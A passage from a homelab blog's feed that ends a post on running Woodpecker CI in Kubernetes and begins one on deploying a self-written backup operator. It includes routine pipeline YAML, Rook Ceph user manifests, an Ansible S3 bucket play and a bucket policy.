certain steps, as we will see later.</p>
<p>One thing I find a little bit lacking at the moment, specifically for the
Kubernetes use case, is the secrets management. It&rsquo;s currently only possible
via the web UI or the CLI. There&rsquo;s no way to provide specific Kubernetes Secrets to
certain steps in a certain pipeline. But there is an open issue to implement
support for Kubernetes Secrets <a href="https://github.com/woodpecker-ci/woodpecker/issues/3582">on Github</a>.
Until that is implemented, the UI needs to be used. It looks like this:
<figure>
    <img loading="lazy" src="secrets.png"
         alt="A screenshot of Woodpecker&#39;s secret configuration UI. It contains a field for a name for the secret and values. In addition, it can be made available only for certain images used in steps. Furthermore, the secret can be restricted to certain events triggering a pipeline run, e.g. only Pushes or Tags or Pull Requests."/> <figcaption>
            <p>Woodpecker&rsquo;s secret addition UI.</p>
        </figcaption>
</figure>

Secrets can be configured for specific repositories, specific orgs where the
forge supports them and for all pipelines.</p>
<p>When looking at a specific repository, all of the pipelines which ran for it
are listed:
<figure>
    <img loading="lazy" src="pipeline_list.png"
         alt="A screenshot of the pipeline list for the mmeier/blog repository. It shows for pipelines. The first one is called &#39;CI: Migrate to Woodpecker&#39; and the most recent one &#39;Publish post on hl-backup-operator deployment&#39;. All of them show that they were pushed directly to the Master branch and took about 1 - 2 minutes each. Each pipeline also shows the Git SHA1 of the commit it tested."/> <figcaption>
            <p>Woodpecker&rsquo;s pipeline list for my blog repo.</p>
        </figcaption>
</figure>

This gives a nice overview of the pipelines which ran recently, here with the
example of my blog repository, including the most recent run for publishing
the post on the backup operator deployment.</p>
<p>Clicking on one of the pipeline runs then shows the overview of that pipeline&rsquo;s
steps and the step logs:
<figure>
    <img loading="lazy" src="pipeline_example.png"
         alt="A screenshot of the pipeline run publishing the hl-backup-operator blog article. At the top right is the subject line of the commit message triggering the pipeline again, &#39;Publish post on hl-backup-operator deployment&#39;. On the left is a list of the steps, showing &#39;clone&#39;, &#39;Hugo Site Build&#39;, &#39;Missing alt text check&#39;, &#39;Hugo Site Upload&#39;. The &#39;Hugo Site Build&#39; step is highlighted, and the logs for that step, showing Hugo&#39;s build output, are shown on the right side."/> <figcaption>
            <p>Woodpecker&rsquo;s pipeline view.</p>
        </figcaption>
</figure>
</p>
<p>This pipeline is not very complex and runs through in about two minutes. So
let&rsquo;s have a look at another pipeline with a bit more complexity.</p>
<h3 id="docker-repo-example">Docker repo example</h3>
<p>Another repository where I&rsquo;m making quite some use of CI is my Docker repository.
In that repo, I&rsquo;ve got a couple of Dockerfiles for cases where I&rsquo;m adding something
to upstream images or building my own where no upstream container is available.</p>
<p>This repository&rsquo;s CI is a bit more complicated mostly because it does the same
thing for multiple different Docker files, and because it needs to do different
things for pull requests and commits pushed to the Master branch.</p>
<p>And that&rsquo;s where the problems begin, at least to a certain extend. As I&rsquo;ve shown
above, you can provide a <code>when</code> config to tell Woodpecker under which conditions
to run the pipeline. And if you leave that out completely, you don&rsquo;t end up
with the pipeline being run for all commits. No. You end up with the pipeline being
run twice for some commits.</p>
<p>Consider, for example, this configuration:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">steps</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">build image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">woodpeckerci/plugin-docker-buildx:latest-insecure</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">settings</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&lt;&lt;</span>: <span style="color:#75715e">*dockerx-config</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">dry-run</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">event</span>: <span style="color:#ae81ff">pull_request</span>
</span></span></code></pre></div><p>Ignore the config under settings, and concentrate on the fact that there&rsquo;s no
<code>when</code> config on the pipeline level, only on the step level. And there&rsquo;s only
one step, that&rsquo;s supposed to run on pull requests. The result of this config
is that two pipelines will be started - including Pod launches, PVC creation
and so on:
<figure>
    <img loading="lazy" src="doubled_pipelines.png"
         alt="A screenshot of Woodpecker showing two pipelines. One failed, one successful. Both show being run for the same commit. One shows that it was launched by a push event to the &#39;woodpecker-ci&#39; branch and the other that it was pushed to pull request 77."/> <figcaption>
            <p>The two pipelines started for the previous configuration, both for the same commit.</p>
        </figcaption>
</figure>

The pipeline <em>#1</em> was launched for the &ldquo;push&rdquo; event to the <em>woodpecker-ci</em> branch,
and the other for the update of the pull request that push belonged to. The push
event pipeline only launched the <em>clone</em> step, while the pull request pipeline
launched the <em>build image</em> step and the clone step.</p>
<p>The root cause for this behavior is that Gitea always triggers the webhook for
all fitting events, one for each event. And consequently, Woodpecker then
launches one pipeline for each event.</p>
<p>A similar effect can be observed when combining both, pull requests and push
events in one <code>when</code> clause on the pipeline level.</p>
<p>Now, you might be saying: Okay, then just configure the triggers only on the
steps, not on the entire pipeline. But that also doesn&rsquo;t really work. Without
a <code>when</code> clause, as shown above, two pipelines are always started for commits
in pull requests. And even though one of the pipelines won&rsquo;t do much, it would
still do something. In my case, it would launch a Pod for the clone step and
also create a PVC and clone the repo - for nothing.</p>
<p>The next idea I came up with: Okay, then let&rsquo;s set the pipeline&rsquo;s <code>when</code> to trigger
on push events, because that would trigger the pipeline for both - pushes to
branches like master and pushes to pull requests. And then just add <code>when</code>
clauses to each step with either the pull request or push event, depending on
when it is supposed to run.
But that also won&rsquo;t work - any given pipeline only ever sees one event. If I
trigger on push events on the pipeline level, the steps triggering on the
pull request event will never trigger.</p>
<p>I finally figured out a way to do this. I always trigger the pipeline on push
events. And then I use Woodpecker&rsquo;s <a href="https://woodpecker-ci.org/docs/usage/workflow-syntax#evaluate">evaluate clause</a>
to trigger only on certain branches.</p>
<p>With all of that said, this is what the config is looking like for the pipeline
which builds my Hugo container:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">event</span>: <span style="color:#ae81ff">push</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#39;.woodpecker/hugo.yaml&#39;</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#39;hugo/*&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">variables</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#75715e">&amp;alpine-version</span> <span style="color:#e6db74">&#39;3.21.2&#39;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#75715e">&amp;app-version</span> <span style="color:#e6db74">&#39;0.139.0-r0&#39;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#75715e">&amp;dockerx-config</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">debug</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">repo</span>: <span style="color:#ae81ff">harbor.example.com/homelab/hugo</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">registry</span>: <span style="color:#ae81ff">harbor.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#ae81ff">ci</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">password</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">from_secret</span>: <span style="color:#ae81ff">container-registry</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">dockerfile</span>: <span style="color:#ae81ff">hugo/Dockerfile</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">context</span>: <span style="color:#ae81ff">hugo/</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mirror</span>: <span style="color:#ae81ff">https://harbor-mirror.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">buildkit_config</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      debug = true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      [registry.&#34;docker.io&#34;]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mirrors = [&#34;harbor.example.com/dockerhub-cache&#34;]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      [registry.&#34;quay.io&#34;]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mirrors = [&#34;harbor.example.com/quay.io-cache&#34;]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      [registry.&#34;ghcr.io&#34;]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        mirrors = [&#34;harbor.example.com/github-cache&#34;]</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">latest</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#75715e">*app-version</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build_args</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">hugo_ver</span>: <span style="color:#75715e">*app-version</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">alpine_ver</span>: <span style="color:#75715e">*alpine-version</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">platforms</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;linux/amd64&#34;</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;linux/arm64&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">steps</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">build image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">woodpeckerci/plugin-docker-buildx:latest-insecure</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">settings</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&lt;&lt;</span>: <span style="color:#75715e">*dockerx-config</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">dry-run</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">evaluate</span>: <span style="color:#e6db74">&#39;CI_COMMIT_BRANCH != CI_REPO_DEFAULT_BRANCH&#39;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">release image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">woodpeckerci/plugin-docker-buildx:latest-insecure</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">settings</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&lt;&lt;</span>: <span style="color:#75715e">*dockerx-config</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">dry-run</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">evaluate</span>: <span style="color:#e6db74">&#39;CI_COMMIT_BRANCH == CI_REPO_DEFAULT_BRANCH&#39;</span>
</span></span></code></pre></div><p>First, what does this pipeline do for pull requests and main branch pushes?
For pull requests, it uses the <a href="https://woodpecker-ci.org/plugins/Docker%20Buildx">buildx plugin</a>
to build a Docker container from the directory <code>hugo/Dockerfile</code> in the repository.
That&rsquo;s what happens in the <em>build image</em> step. Notably, no push to a registry
happens here.
In the case of pushes to the repo&rsquo;s default branch, which is provided by Gitea
in the webhook call, the same plugin and build is used, but this time the
newly build images are pushed to my Harbor registry. For more details on that
setup, <a href="https://blog.mei-home.net/posts/k8s-migration-11-harbor/">see this post</a>.</p>
<p>In the <code>when</code> clause for the pipeline, as I&rsquo;ve explained above, I&rsquo;m triggering
on the push event, to circumvent the problem with multiple pipelines being
executed for commits in pull requests.
In addition, I&rsquo;m also making use of path-based triggers. Because I&rsquo;ve got multiple
container images defined in one repository, I&rsquo;d like to avoid running the builds
for images which haven&rsquo;t changed unnecessarily. That&rsquo;s done by triggering the
pipeline only on changes in its own config file and changes in the <code>hugo/</code> directory.
So if the Hugo image definition and CI config haven&rsquo;t changed, the pipeline won&rsquo;t
be triggered.</p>
<p>As you can see I&rsquo;m building images for both, AMD64 and ARM64. And before I
close this section, I have to tell a slightly embarrassing story. I initially
tried to run two pipelines - one for each architecture, so that they could
both run in parallel on different nodes fitting their architecture. This would
avoid the cost of emulating a foreign architecture, making the builds faster
overall.
This seemed like an excellent idea. And it worked really, really well. The
pipelines got a couple of minutes faster. Until I had a look at my Harbor
instance. And as some of you might have already figured out, I found that of
course there was not one tag with images for both architectures.
Instead, the tag contained whatever pipeline finished last. Because of course,
two different Docker pushes override each other, instead of doing a merge.
This is a problem I need to have another look at later. Someone on the Fediverse
already showed me that there is a multistep way to do this manually.</p>
<p>Another point that I still need to improve is image caching. I think that there&rsquo;s
still some potential for optimization in my setup. But that&rsquo;s also something for
after the k8s migration is done.</p>
<p>Before I close out this section, I would like to point out a pretty nice feature
Woodpecker has: A linter for the pipeline definitions, for example like this:</p>
<figure>
    <img loading="lazy" src="linter.png"
         alt="A screenshot of Woodpecker&#39;s linter output. It shows a number of issues with the pipeline config. For example that steps.1.environment and steps.2.environment are both of an invalid type. It expected an array, but got a null. And for all of the steps it outputs a &#39;bad_habit&#39; warning about the fact that neither the pipeline nor any of the steps have a &#39;when&#39; clause."/> <figcaption>
            <p>Example output of Woodpecker&rsquo;s config linter.</p>
        </figcaption>
</figure>

<p>The configuration spitting out those warnings is this one for my blog:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">steps</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">submodules</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">alpine/git</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">git submodule update --init --recursive</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Hugo Site Build</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#e6db74">&#34;harbor.example.com/homelab/hugo:0.125.4-r3&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">environment</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">hugo</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Missing alt text check</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">python:3</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">environment</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">pip install lxml beautifulsoup4</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">python3 scripts/alt_text.py ./public/posts/</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Hugo Site Upload</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#e6db74">&#34;harbor.example.com/homelab/hugo:latest&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">environment</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">AWS_ACCESS_KEY_ID</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">from_secret</span>: <span style="color:#ae81ff">access-key</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">AWS_SECRET_ACCESS_KEY</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">from_secret</span>: <span style="color:#ae81ff">secret-key</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">s3cmd -c /s3cmd.conf sync -r --delete-removed --delete-after --no-mime-magic ./public/ s3://blog/</span>
</span></span></code></pre></div><p>The main issues are the empty <code>environment</code> keys, as well as the fact that I did
not set any <code>when</code> clause.</p>
<h2 id="conclusion">Conclusion</h2>
<p>And that&rsquo;s it. Again a pretty long one, but I had never written about my CI setup
and wanted to take this chance to do so, also because I had gotten some
questions on the Fediverse from people what a CI actually does, and some interest
in what Woodpecker looks like.</p>
<p>Oh and also, I just have a propensity for long-winded writing. &#x1f605;</p>
<p>With this post, the Woodpecker/CI migration to k8s is done, and I&rsquo;m quite happy
with it. Especially the fact that my CI pipeline steps now get distributed over
the entire cluster instead of just running on the nodes with the agents.</p>
<p>For the next step I will likely take my Gitea instance and migrate it over, but
as this blog post took longer than I thought it would, it might have to wait
until next weekend.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 14: Deploying the Backups</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-14-backup-operator/</link>
      <pubDate>Thu, 23 Jan 2025 21:50:30 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-14-backup-operator/</guid>
      <description>Deploying my backup operator into the cluster</description>
      <content:encoded><![CDATA[<p>Wherein I&rsquo;m finally done with the backups in my Homelab&rsquo;s k8s cluster.</p>
<p>This is part 15 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>Finally, I&rsquo;m done. After months of writing Python code for my backup operator.
Especially during the middle phase of the implementation, after the initial
planning and design, it felt like a slog. Dozens of tasks, many functions to
implement, and seemingly no end in sight. I&rsquo;m rather elated to finally be able
to write another post in the k8s migration series.</p>
<p>In this post, I will not write much about how the operator is implemented.
Instead, I will give it the same treatment I gave the other apps I&rsquo;ve deployed
into the cluster up to now, as if I hadn&rsquo;t written it myself.</p>
<p>If you&rsquo;re interested in the implementation, take a look at the
<a href="https://blog.mei-home.net/tags/hlbo/">series of posts</a> I wrote about it.</p>
<p>Suffice it to say for now that the operator reads a CRD defining some S3 buckets
and PersistentVolumeClaims to be backed up, and launches Pods which use rclone
and restic to do just that.</p>
<h2 id="infrastructure-preparation">Infrastructure Preparation</h2>
<p>Besides the backup operator itself, I also need some additional infrastructure.
The backups themselves use restic with an S3 bucket as a target. I&rsquo;m going with
one bucket per app here. So before I can run the first backups, I need a couple
of S3 users and buckets.</p>
<p>If you would like to read a bit more about my S3 setup, have a look at
<a href="https://blog.mei-home.net/posts/k8s-migration-5-s3-buckets/">this post</a></p>
<p>The first two things needed are the <code>backups</code> and <code>service-backup-user</code> users.
The <code>backups</code> user is the owner of all of the backup buckets, while
<code>backups-services</code> is a reduced-permissions user for the actual backups:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">ceph.rook.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CephObjectStoreUser</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backups</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">store</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">clusterNamespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">displayName</span>: <span style="color:#e6db74">&#34;Common user for backup buckets&#34;</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">ceph.rook.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CephObjectStoreUser</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">service-backup-user</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">store</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">clusterNamespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">displayName</span>: <span style="color:#e6db74">&#34;User for service backups&#34;</span>
</span></span></code></pre></div><p>With these two manifests, <a href="https://rook.io/">Rook Ceph</a> will create two S3
users in my bulk storage, which is the part of my Ceph cluster backed by HDDs.</p>
<p>Due to the fact that I&rsquo;m doing the bucket management itself through Ansible,
I also need to push these secrets to my <a href="https://www.vaultproject.io/">Vault</a>
instance, to make them available during Ansible runs. Although, now that I&rsquo;m
writing this, I&rsquo;m wondering whether Ansible has a k8s Secrets lookup plugin?
Something to look into later.</p>
<p>For pushing Secrets to Vault (and creating Secrets from Vault data), I&rsquo;m using
<a href="https://external-secrets.io/latest/">external-secrets</a>.
Specifically, PushSecret in this case:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PushSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">s3-backupsuser</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">deletionPolicy</span>: <span style="color:#ae81ff">Delete</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#ae81ff">30m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRefs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelab-vault</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">secret</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>:  <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-backups</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">match</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">remoteKey</span>: <span style="color:#ae81ff">secrets/backups</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">property</span>: <span style="color:#ae81ff">access</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">match</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">remoteKey</span>: <span style="color:#ae81ff">secrets/backups</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">property</span>: <span style="color:#ae81ff">secret</span>
</span></span></code></pre></div><p>As always with secrets related stuff, this is a bit obfuscated.
What this manifest does is take the Secret automatically created by Rook Ceph at
<code>rook-ceph-object-user-rgw-bulk-backups</code> and pushing the S3 access key
and secret key to the Vault KV store <code>secrets</code> at the entry <code>backups</code>.</p>
<p>Then I&rsquo;m creating the S3 buckets themselves. I&rsquo;m doing this with the Ansible
<a href="https://docs.ansible.com/ansible/latest/collections/amazon/aws/s3_bucket_module.html">amazon.aws.s3_bucket</a>
module. The Ansible play looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">candc</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Play for creating the backup buckets</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">backup</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">vars</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3_access</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;hashi_vault&#39;, &#39;secret=secret/backups:access token=&#39;+vault_token+&#39; url=&#39;+vault_url) }}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3_secret</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;hashi_vault&#39;, &#39;secret=secret/backups:secret token=&#39;+vault_token+&#39; url=&#39;+vault_url) }}&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Create service backup buckets</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">backup</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">buckets</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">amazon.aws.s3_bucket</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backup-{{ item }}</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">access_key</span>: <span style="color:#e6db74">&#34;{{ s3_access }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secret_key</span>: <span style="color:#e6db74">&#34;{{ s3_secret }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">ceph</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">endpoint_url</span>: <span style="color:#ae81ff">https://s3.example.com</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">policy</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;ansible.builtin.template&#39;,&#39;bucket-policies/backup-services.json.template&#39;) }}&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">loop</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">audiobookshelf</span>
</span></span></code></pre></div><p>This play first fetches the credentials pushed into Vault with the PushSecret
above, using the Vault plugin. Be cautious when looking for info on Vault in
Ansible, Ansible&rsquo;s own secret storage is unfortunately also called vault.
This uses my Vault token I have to generate on my C&amp;C host before I can do
pretty much anything, which in turn needs credentials not stored on said host.</p>
<p>My backup buckets always follow the <code>backup-$APP</code> convention, and I&rsquo;m iterating
over the apps I need backup buckets for via a loop.
Also interesting to mention is the policy set here, which is the S3 bucket
policy for the new bucket.
It&rsquo;s created from this template:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;Version&#34;</span>: <span style="color:#e6db74">&#34;2012-10-17&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;Statement&#34;</span>: [
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Action&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetObject&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:DeleteObject&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:PutObject&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:ListBucket&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetBucketLocation&#34;</span>
</span></span><span style="display:flex;"><span>      ],
